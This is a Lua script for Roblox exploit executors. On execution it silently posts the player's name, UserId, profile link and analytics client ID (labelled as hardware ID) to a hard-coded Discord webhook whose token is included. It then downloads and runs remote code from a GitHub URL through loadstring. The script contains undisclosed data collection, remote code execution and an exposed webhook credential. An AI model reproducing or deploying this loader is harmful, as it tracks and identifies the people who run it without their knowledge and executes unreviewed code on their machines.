HttpService = game:GetService("HttpService")
Webhook_URL =  "https://discord.com/api/webhooks/1071504499480461424/wZ4Oodfi7UwBE0_0Vh_Wiq2y5beKmlTDpD3No5pikjrL2kMmhouV9KEaHdqFSx5VS4uS "

local request = syn and syn.request or request or http and http.request or http_request

local response = request({
    Url = Webhook_URL,
    Method = "POST",
    Headers = {
        ['Content-Type'] = 'application/json'
    },
    Body = HttpService:JSONEncode({
        ["content"] = "",
        ["embeds"] = {
            {
                ["title"] = "",
                ["description"] = game.Players.LocalPlayer.Name .." Execute Script In Roblox ",
                ["type"] = "rich",
                ["color"] = tonumber(0xffffff),
                ["fields"] = {
                    {
                        ["name"] = "Player Name : ",
                        ["value"] = game.Players.LocalPlayer.Name,
                        ["inline"] = true
                    }, {
                        ["name"] = "UserId : ",
                        ["value"] = game.Players.LocalPlayer.UserId,
                        ["inline"] = true
                    }, {
                        ["name"] = "User Profile : ",
                        ["value"] = "https://www.roblox.com/users/" ..
                            game.Players.LocalPlayer.UserId,
                        ["inline"] = true
                    }, {
                        ["name"] = "Client Id : ",
                        ["value"] = game:GetService("RbxAnalyticsService")
                            :GetClientId(),
                        ["inline"] = true
                    }, {
                        ["name"] = "HardWare : ",
                        ["value"] = game:GetService("RbxAnalyticsService"):GetClientId(),
                        ["inline"] = true
                    }
                }
            }
        }
    })
})

wait(3)

loadstring(game:HttpGet('https://raw.githubusercontent.com/coltliz/alora/main/alora', true))()
